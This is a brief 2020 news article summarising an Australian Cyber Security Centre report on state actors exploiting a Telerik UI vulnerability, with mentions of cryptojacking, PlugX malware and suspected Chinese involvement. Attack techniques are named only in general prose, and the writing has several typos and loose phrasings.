Hackers Use Cryptojacking Exploits To Hack Australian Network, ACSC

June 29, 2020      Jyoti Singh

A 48-pages report by Australian Cyber Security Center (ACSC) published on June 24, notified that a group of ‘state actors’ entered into the Australian network to manipulate the vulnerabilities related to cryptojacking malware attacks.

According to the report, the actors actually have manipulated four vulnerabilities in Terelik UI which include CVE-2019-18935.

Blue Mockingbird Uses Terelik UI Vulnerability

It is to be noted that recently, the Blue Mockingbird malware gang has used the CVE-2019-18935 to damage the systems using Monero mining software.

It is yet to be confirmed whether the hackers were able to install the cryptojacking malware when they attacked the network. The cybercriminals mostly use this kind of malware as it allows to install crypto-mining applications within the corporate network.

The CVE-2019-18935 vulnerability is a bit similar to the attack of Blue Mockingbird, but that does not mean that the Mockingbird was the part of the recent cyberattack in Australia.

The ACSC identified the mostly manipulated or damaged payload because the threat actors failed at the reverse shell. The identified ones are the payloads which tried to execute a Power Shell reverse shell; payload tryings to execute certutil.exe so that it could download another payload; payload that executed binary malware; and a payload that calculator the absolute path of the webroot.

PlugX Malware Also Used To Exploit Australian Network 

The report further mentioned that one of the malware the Australian government found was PlugX, which is used by the group of Chinese hackers who supposedly, are connected with the Government of China.

According to Australian officials, there are great chances of China being behind this cyberattack because, since a long time, the diplomatic issue between the two countries is rising.

The officials have suggested that this attack could have taken place because earlier, the Australian Government called for an investigation on COVID-19’s origin, but the dragon national officials were not happy with it.

The Chinese officials stated that this investigation was a discriminatory accusation and reacted with trade retaliation.

Articles You May Read.

Jyoti Singh
Jyoti Singh

Jyoti is a graduate from GGSIPU and has done her PG Diploma in English Journalism from IIMC. Presently, she is working as a content writer with Agio Support Solution Pvt. Ltd. Her aim is to provide informative content about cryptocurrency and blockchain, to the tech-enthusiasts.